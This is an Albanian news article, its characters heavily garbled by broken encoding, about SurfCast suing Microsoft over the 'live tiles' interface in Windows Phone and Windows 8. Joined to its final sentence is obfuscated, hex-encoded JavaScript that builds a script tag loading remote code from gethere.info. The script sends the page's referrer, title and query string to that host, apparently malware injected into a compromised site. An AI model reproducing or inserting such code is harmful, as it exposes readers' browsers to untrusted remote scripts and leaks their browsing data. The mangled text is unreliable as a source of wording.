largea_surface051352151977

Microsofti paditet pA�r shkak tA� a�?pllakA�zavea�?

Microsofti A�shtA� paditur pA�r shkak tA� idesA� praktike e cila qA�ndron prapa tA�rA� identitetit vizual tA� kA�saj kompanie, dhe nA� tA� cilA�n bazohet edhe funkisionaliteti i sistemit operativ. BA�het fjalA� pA�r a�?pllakA�zat e gjallaa�? nA� interfejsin e Windows Phone dhe Windows 8.

Para dy vitesh, gjatA� publikimit tA� Windows Phone 7, Microsofti kishte prezantuar edhe konceptin e a�?pllakA�zave tA� gjallaa�? tA� cilat kanA� shA�rbyer si element ndA�rtues pA�r interfejsin e sistemit operativ mobil dhe aplikacioneve pA�rkatA�se. Koncepti tani A�shtA� zgjeruar edhe nA� Windows 8, ndA�rsa tA�rA� identiteti vizual i Microsoftit bazohet nA� principin e thjeshtA�sisA� tA� cilin e propagandojnA� a�?pllakA�zat e gjallaa�?.

Por, qA� tA� mos shkojA� krejt kaq lehtA�, A�shtA� kujdesur kompania SurfCast e cila pohon qA� ky koncept A�shtA� nA� tA� vA�rtetA� i saj. Po ashtu, qA� kjo gjA� qA� mos mbetet vetA�m nA� fjalA�, ka ngritur edhe padi formale nA� gjyq, ndA�rsa ajo qA� i pengon mA� sA� shumti kompanisA� SurfCast A�shtA� shitja e kompjuterA�ve me interfejsin e bazuar nA� pllakA�za.

Patenti kontestues A�shtA� regjistruar pranA� entit amerikane tA� patenteve nA� vitin e largA�t 2000, ndA�rsa nA� pika tA� trasha ka tA� bA�jA� me pA�rzgjedhjen e burimeve tA� shumA�fishta tA� informatave, dhe ndarjen e a�?pllakA�zA�sa�? sA� posaA�me pA�r secilin burim. Tutje, informatat nA� a�?pllakA�zaa�? freskohen nA� intervale tA� caktuara kohore, pikA�risht siA� ndodh edhe nA� Windows.

SurfCast A�shtA� kompani e cila nuk ka zhvillim dhe as prodhim tA� A�farA�do prodhimi, kurse ajo A�farA� a�?bA�na�? A�shtA� posedimi i patenteve dhe licencimi i tyre tA� tjerA�ve. NA� mungesA� tA� marrA�veshjes pA�r licencim, kjo kompani vrapon pas padive, me shpresA� qA� tA� a�?nxjerrA�a�? ndonjA� akord.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}